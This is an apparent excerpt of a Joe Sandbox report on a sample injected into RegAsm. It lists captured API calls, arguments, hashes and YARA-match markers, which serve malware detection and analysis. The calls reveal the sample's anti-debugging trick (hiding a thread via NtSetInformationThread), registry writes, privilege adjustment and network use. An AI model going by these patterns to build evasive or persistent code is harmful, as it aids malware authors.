                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction ID: e484142993a572a07505ebc82e0b781c011902aa697f42112058c028315f2482
                                  • Opcode Fuzzy Hash: 075b58a0557ade9534a3dec0b9382b3f104376bb3c31c7d4d482421de13dbc5e
                                  • Instruction Fuzzy Hash: 89E1DA93E1E5147FE6A04D29E8E23AEA2D20750350FB8D1099E51AF78DE7ACFC4653C0
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction ID: 6a1a5d4619e0ffb2d2eab1a66888287c63953659477df0ad3e059f9f1b4dc970
                                  • Opcode Fuzzy Hash: be423587d4f69cb26d68848b99c0aff552a16ecf015ed77986f47de5f307b8fb
                                  • Instruction Fuzzy Hash: 43915974B40305AFEF306EA48C96BDA3753AF427A0F64411AFD85971C1DFB9C886B612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationThread
                                  • String ID: 1.!T
                                  • API String ID: 4046476035-3147410236
                                  • Opcode ID: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction ID: 4ed075508648dfc69010a51a4d5c1dc89fa5b8b2f17082b610cd0c417b48bb02
                                  • Opcode Fuzzy Hash: ae82644baae1b2402e6816c366610ef02a75366e36d6af6e31ebde68cc31dee5
                                  • Instruction Fuzzy Hash: D1918970F40305AAFF306E64CC96BDA3653AF867A0F640129FD84971C1DFB89C8AB615
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction ID: 32c78f095d7919bba1b5574ebcc4dc73269df6708b387c3671adfac56e085aba
                                  • Opcode Fuzzy Hash: 26056ae46e39905a1e3d51aefb313d98131d031c7a56edcbf01291416ea960fa
                                  • Instruction Fuzzy Hash: 69614970F40305AAEF306A648CD6BDA36526F417A0F64412AFD85971C1CFBCD88AB615
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                    • Part of subcall function 00F081CF: LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InformationLibraryLoadThread
                                  • String ID: 1.!T
                                  • API String ID: 543350213-3147410236
                                  • Opcode ID: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction ID: 1cbba4a89c3b6965a055aa8ba7aa60d661366358a7d3dd82717cc610d90fd020
                                  • Opcode Fuzzy Hash: 4d18b91f56fdd8792a63588e8d1d224e2a450ae394e87829301782603fa06be9
                                  • Instruction Fuzzy Hash: 02516A70F40305AAFF345A649CD6BDA37066F427A0F68012AFD85971C1CFA9D88AB612
                                  Uniqueness

                                  Uniqueness Score: 1.91%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 1.!T
                                  • API String ID: 0-3147410236
                                  • Opcode ID: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction ID: fd6834105e18a59f9c6097c6cc47e15d9afe35ba0a9b0b383f7876e65cd5e817
                                  • Opcode Fuzzy Hash: 3354b6e6c4ee9e5599cef383cbfd7b4a2cffadf4d1ffec653b6aa3ce2308c8d6
                                  • Instruction Fuzzy Hash: 66210AB5B40306AEEF30AE748D61BDD36C28F84760FB48126BE416B2C4DE78D8437615
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  APIs
                                  • Sleep.KERNEL32(00000800,?,00000000,00000011,00000000,00000000,?,00000000,00000000,Function_0000A810,00000000,00000000,00000000), ref: 00F02B2E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction ID: ff4b9686de0e36174efe990d10fbca71da5eaae0867dd9c4588638afa4014297
                                  • Opcode Fuzzy Hash: cb8104912665ef0133ece89a500bfd49e73c1bea20618522217c05156157e0d2
                                  • Instruction Fuzzy Hash: 2A3101B0604301AFEB246E24CD4DBE873A2BF017A4F544248EE519B0D2DBB4D880EA11
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: +$^7
                                  • API String ID: 0-4122397898
                                  • Opcode ID: d139511b3c7a85fdccb8993fb85b391b2a713777d4256932a2e5b12485ed7cbb
                                  • Instruction ID: ede169dc9619c7640135b743b03d3795acaacb2ba50d461f7b177e4ffaf0aebb
                                  • Opcode Fuzzy Hash: d139511b3c7a85fdccb8993fb85b391b2a713777d4256932a2e5b12485ed7cbb
                                  • Instruction Fuzzy Hash: 1EE15FB0D00219CFEB14CFA8E99479DBBB2FF84354F208229E416AB396D775A945CF11
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 204F2ADB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: bb42e42a53dfca5094beef99908e408b1d8ab597f3182577064dcb31458deb7d
                                  • Instruction ID: 29b691a787cf08ce38b5f1a02350ef07e557fcb4bd97e131887ed07332cb02e7
                                  • Opcode Fuzzy Hash: bb42e42a53dfca5094beef99908e408b1d8ab597f3182577064dcb31458deb7d
                                  • Instruction Fuzzy Hash: E021AE76509784AFDB128F65DC44B52BFB4EF06310F0884DAED858B263D375E918CBA2
                                  Uniqueness

                                  Uniqueness Score: 0.18%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 204F2D0D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: ef743420c98d905ddf9180b47d33a44eab3fb6e2b290532216873debf0d2ba71
                                  • Instruction ID: 4ae86b3853a2899bb06e79352c26c1d01a203b80d44b8c9d56ec23e74d5ec2ad
                                  • Opcode Fuzzy Hash: ef743420c98d905ddf9180b47d33a44eab3fb6e2b290532216873debf0d2ba71
                                  • Instruction Fuzzy Hash: 83219D754097C4AFD7128B20DC45A52FFB0EF17214F0984CBED848B1A3D2699A19DB62
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 204F2ADB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: AdjustPrivilegesToken
                                  • String ID:
                                  • API String ID: 2874748243-0
                                  • Opcode ID: a93428845387b635967f6f3ada0f32a0c43506b78d5f27ab44f7614fe49641b4
                                  • Instruction ID: 420ed5a67dfff93129594929bd6400b67a388f0ad44a823c96b03687717e9adb
                                  • Opcode Fuzzy Hash: a93428845387b635967f6f3ada0f32a0c43506b78d5f27ab44f7614fe49641b4
                                  • Instruction Fuzzy Hash: 3111A0356003449FDB20CF95D988B56FBE4EF04220F08C4AADD498B652D779E918DFA2
                                  Uniqueness

                                  Uniqueness Score: 0.18%

                                  APIs
                                  • NtQuerySystemInformation.NTDLL ref: 204F2D0D
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: InformationQuerySystem
                                  • String ID:
                                  • API String ID: 3562636166-0
                                  • Opcode ID: 1f069f753299cbe68ed6896889a1ef4be9200b85a25bc6b642fe18a9296ef1ec
                                  • Instruction ID: 4fe4cc912dccf024f674e50bc5cd15fd180c4c0e71ca5b6ffe973128192c331c
                                  • Opcode Fuzzy Hash: 1f069f753299cbe68ed6896889a1ef4be9200b85a25bc6b642fe18a9296ef1ec
                                  • Instruction Fuzzy Hash: 0601AD355006449FEB20CF45D988B52FFA0EF44320F18C49ADD894B712C37AE918DFA2
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00F09515,00000040,00F00A94,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F09B65
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
                                  • Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
                                  • Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: JJ$EV_V^$uV_V^$V_V^
                                  • API String ID: 0-2967845765
                                  • Opcode ID: ce512fe6a5d4d8dc32d0014a45f3ba01b0775d15d83fcdc3e713e635d2b324b5
                                  • Instruction ID: c6391741812328c3ecd9b0556eddf294eac491afe31ad50236bcda37aa8bd4f5
                                  • Opcode Fuzzy Hash: ce512fe6a5d4d8dc32d0014a45f3ba01b0775d15d83fcdc3e713e635d2b324b5
                                  • Instruction Fuzzy Hash: E98175B0A00204CFDB10EFB9C4946EDBBF2AB85304F508959D057AB391DB7AA945CF96
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  APIs
                                  • InternetOpenA.WININET(00F05AC4,00000000,00000000,00000000,00000000,00F0124E,00000000,00000000,00000000,00000000,0000006D,0000020C,?,00F05A48,00000000,000000FF), ref: 00F052C9
                                  • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004,?,00000004,00000000,?,00000000), ref: 00F0532E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InternetOpen
                                  • String ID:
                                  • API String ID: 2038078732-0
                                  • Opcode ID: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction ID: 820cde72d2ab3fb4074ef3521dbc317c3ba4fb1654814bf29179b312da00da35
                                  • Opcode Fuzzy Hash: bc5163e42e9add266c6683ac9f16a41edb28294c7a844079115d7c557696cb88
                                  • Instruction Fuzzy Hash: 7131613024438AEBEF358E64CD55BEE3666AF04740F508029FD4E9A1D1E7B19984FF20
                                  Uniqueness

                                  Uniqueness Score: 4.01%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5U_V^$T_V^
                                  • API String ID: 0-1992429273
                                  • Opcode ID: bee9347ee2fa5de8214e89284e6c930c9c0f26377a861ffb17b6aef32689411c
                                  • Instruction ID: b93b1080946594afe713e27d790d222513157da45afffbee66e37e96e5636c13
                                  • Opcode Fuzzy Hash: bee9347ee2fa5de8214e89284e6c930c9c0f26377a861ffb17b6aef32689411c
                                  • Instruction Fuzzy Hash: 0E61BF31B002108FD704EF38D9A479D37E2BBC5714F6589A8D0079F392DB76A946CB92
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5U_V^$T_V^
                                  • API String ID: 0-1992429273
                                  • Opcode ID: e013de02c33803ac0cbdb02898b77b9a2ed51601010130128044a542bb8cecab
                                  • Instruction ID: ebbe4e09f8a3dcf9383f18c16b49d26bb16692a0e00208406f5c9dc1829e8c5a
                                  • Opcode Fuzzy Hash: e013de02c33803ac0cbdb02898b77b9a2ed51601010130128044a542bb8cecab
                                  • Instruction Fuzzy Hash: F541EF71A002608FD704EF38C49576D7BB2AB86314F6585ACD40B9F382CB76EC46CB92
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Control-flow Graph

                                  APIs
                                  • RegCreateKeyExA.KERNEL32(80000001,00F068D8,00000000,00000000,00000000,000F003F,00000000,?,?,00F01137,?,?,00000000,00000000,000000FF,00000007), ref: 00F017FE
                                    • Part of subcall function 00F01820: RegSetValueExA.KERNEL32(?,00F068C2,00000000,00000001,?,?,?,?,?,?,00F01137,?,?,00000000,00000000,000000FF), ref: 00F01831
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateValue
                                  • String ID:
                                  • API String ID: 2259555733-0
                                  • Opcode ID: d9f395971c2ca6145ebf6f93edd2d5dc9cf51339c3d344746328083a87b90d0b
                                  • Instruction ID: df3224735ee7695bd37039545709cca4ab766c42fb1b294b847f88a9515ba62f
                                  • Opcode Fuzzy Hash: d9f395971c2ca6145ebf6f93edd2d5dc9cf51339c3d344746328083a87b90d0b
                                  • Instruction Fuzzy Hash: 20C17AD3D1E5543FA2A18D29E9A23AEE6E117613007B8D2498E519FB8EF36CFC0153C1
                                  Uniqueness

                                  Uniqueness Score: 0.14%

                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileInformationThread
                                  • String ID:
                                  • API String ID: 2580995559-0
                                  • Opcode ID: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction ID: 93f3d983b54c90a45d90d3c3588df8f13f782939a1eb41f3a165c06ca607a7be
                                  • Opcode Fuzzy Hash: 00133cc32faff595a26c4de06b7b911790b2ec6a7b4a7baf7a59f1db3d213b15
                                  • Instruction Fuzzy Hash: 11B1E693E1E5156FA6A49D2DE8D13AFA2E257A03107F8D1188E119F78DE3ACFC4253C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,000000C0), ref: 00F00AC8
                                  • CreateFileW.KERNEL32(?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0A7D8
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFileInformationThread
                                  • String ID:
                                  • API String ID: 2580995559-0
                                  • Opcode ID: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction ID: 5aa26fa036ad608adecce74571da29aa50c6d554b1c172716bed1ecb92adb548
                                  • Opcode Fuzzy Hash: be58969baf69663eeee644a64fb9ef284b25a6643e8ecf1cff3a39de77eeaf43
                                  • Instruction Fuzzy Hash: 2CB1E893E1E5156FA6A48D2DE8D13AFA2E257A03107F8D1188E119F78DE3ACFC4253C1
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  APIs
                                  • TerminateThread.KERNEL32(000000FE,00000000), ref: 00F02F78
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: TerminateThread
                                  • String ID:
                                  • API String ID: 1852365436-0
                                  • Opcode ID: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction ID: 588ba526f6859e4ed735627b89a88120e583cf20e1c4f6089979a1b07c4b1a50
                                  • Opcode Fuzzy Hash: 6670c59fd34363fb74b30b30c27a4bf1a5391331b13fca0eaddc9fd4ae2d1e1f
                                  • Instruction Fuzzy Hash: 32913393E5E5183F66A04C2DF8A67AEA2E243907007F4D2049F126F78DF3ACBC4206C0
                                  Uniqueness

                                  Uniqueness Score: 1.31%

                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1DB1A731
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: eba814ec7f4b3e92fc02a618638aea8c89830aed828184392d121930831640f3
                                  • Instruction ID: e51fef598bcf34ee980d52231238bb77c4f911b710c97a9876bf649b0de857a9
                                  • Opcode Fuzzy Hash: eba814ec7f4b3e92fc02a618638aea8c89830aed828184392d121930831640f3
                                  • Instruction Fuzzy Hash: 8D31B0B10093806FE7128B649C84FA7FFB8EF06210F08859BE985DB193D224A909C761
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • CreateDirectoryW.KERNEL32(?,?,36F215F7,00000000,?,?,?,?,?,?,?,?,74123C38), ref: 1DB1BCBF
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: 29408ef27eadf676ecd10efe29dbd220d22ea5ad1f5f99b447db4fa0db002479
                                  • Instruction ID: d0f5fc20d16eb3d436a5fa669e67462fd694254eff46821cc2738a9e1c1c6fa5
                                  • Opcode Fuzzy Hash: 29408ef27eadf676ecd10efe29dbd220d22ea5ad1f5f99b447db4fa0db002479
                                  • Instruction Fuzzy Hash: B931367150E3C19FD7038B759865A92BFB49F03220B0E84EBD885CF1A3D6689849CB72
                                  Uniqueness

                                  Uniqueness Score: 0.03%

                                  APIs
                                  • WSASocketW.WS2_32(?,?,?,?,?), ref: 204F0D6A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: Socket
                                  • String ID:
                                  • API String ID: 38366605-0
                                  • Opcode ID: f4063259004a132ed2c595b8f3f74895f817687fcb35110f2ec8213bd6aebf13
                                  • Instruction ID: f1dfff9c332c0f951c719f6193e8576c74ae28f3e5560dfaa50c4bf4d14af43d
                                  • Opcode Fuzzy Hash: f4063259004a132ed2c595b8f3f74895f817687fcb35110f2ec8213bd6aebf13
                                  • Instruction Fuzzy Hash: AA31A1715097C0AFE7138B60DC54B52BFB4EF47210F0884DAE9858F2A3C369A908CB62
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,B769339E,?,00F00A3C,?,?,?,?,?,000000C0,?,?,00000000,?,00F004BD,00000000), ref: 00F0822B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction ID: f1b80b91cd7e37bc29872323b04103e3c0bd7e8d6d7d4b748be8016babe91a36
                                  • Opcode Fuzzy Hash: 75225bba369b5256672b6e8c27de006746047b5c26f70e36a30c11dd7c9d6c16
                                  • Instruction Fuzzy Hash: 5F214E74A043075ADB14AE64C9E07F72752AF567A0F94412CFCC587186DB64C847B600
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • getaddrinfo.WS2_32(?,00000EB4), ref: 204F1E63
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: getaddrinfo
                                  • String ID:
                                  • API String ID: 300660673-0
                                  • Opcode ID: b48d83cc5b8df8f7b7cad42e44b38390fbe26ac973970951cd0cfb9665c704f8
                                  • Instruction ID: 07c2d5e4e0a374ae32c47fe320b58a6943aa5423d35eef2bbeeb64a4325e379f
                                  • Opcode Fuzzy Hash: b48d83cc5b8df8f7b7cad42e44b38390fbe26ac973970951cd0cfb9665c704f8
                                  • Instruction Fuzzy Hash: 4F31B1B1500344AFE721DB50CC84FA6FBACEF45310F04859AFA459B192D774AA48CB61
                                  Uniqueness

                                  Uniqueness Score: 0.39%

                                  APIs
                                  • CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1DB1ABA5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320324071.000000001DB1A000.00000040.00000001.sdmp, Offset: 1DB1A000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db1a000_RegAsm.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 65b20f877a98658658b8ac0931475cf76e73a766ba9908bd228feb68ff53d235
                                  • Instruction ID: cf9919f712f4755b8a91e7bd9a29c1ec0b6f9f77e2b904680a3a89fb190b61ff
                                  • Opcode Fuzzy Hash: 65b20f877a98658658b8ac0931475cf76e73a766ba9908bd228feb68ff53d235
                                  • Instruction Fuzzy Hash: FD318BB1504380AFE722CF25DC44B67BBE8EF05620F08849AE9858B252D335E909CB71
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  APIs
                                  • GetProcessTimes.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 204F18A5
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326413585.00000000204F0000.00000040.00000001.sdmp, Offset: 204F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204f0000_RegAsm.jbxd
                                  Similarity
                                  • API ID: ProcessTimes
                                  • String ID:
                                  • API String ID: 1995159646-0
                                  • Opcode ID: 2a1197e371d659bc757d101097b704bde29d43f4a41a1e64025856a862099b81
                                  • Instruction ID: 7f9b31f573b93771f25a0f1a3f204914a8495174e86abd62718b1262022bcd49
                                  • Opcode Fuzzy Hash: 2a1197e371d659bc757d101097b704bde29d43f4a41a1e64025856a862099b81
                                  • Instruction Fuzzy Hash: DB31D5725097846FE712CF60DC85B96BFB8EF46320F0884DAE985DB163D325A909CB71
                                  Uniqueness

                                  Uniqueness Score: 0.34%

                                  APIs
                                  • RegQueryValueExW.KERNEL32(?,00000EB4,36F215F7,00000000,00000000,00000000,00000000), ref: 1DB1A834
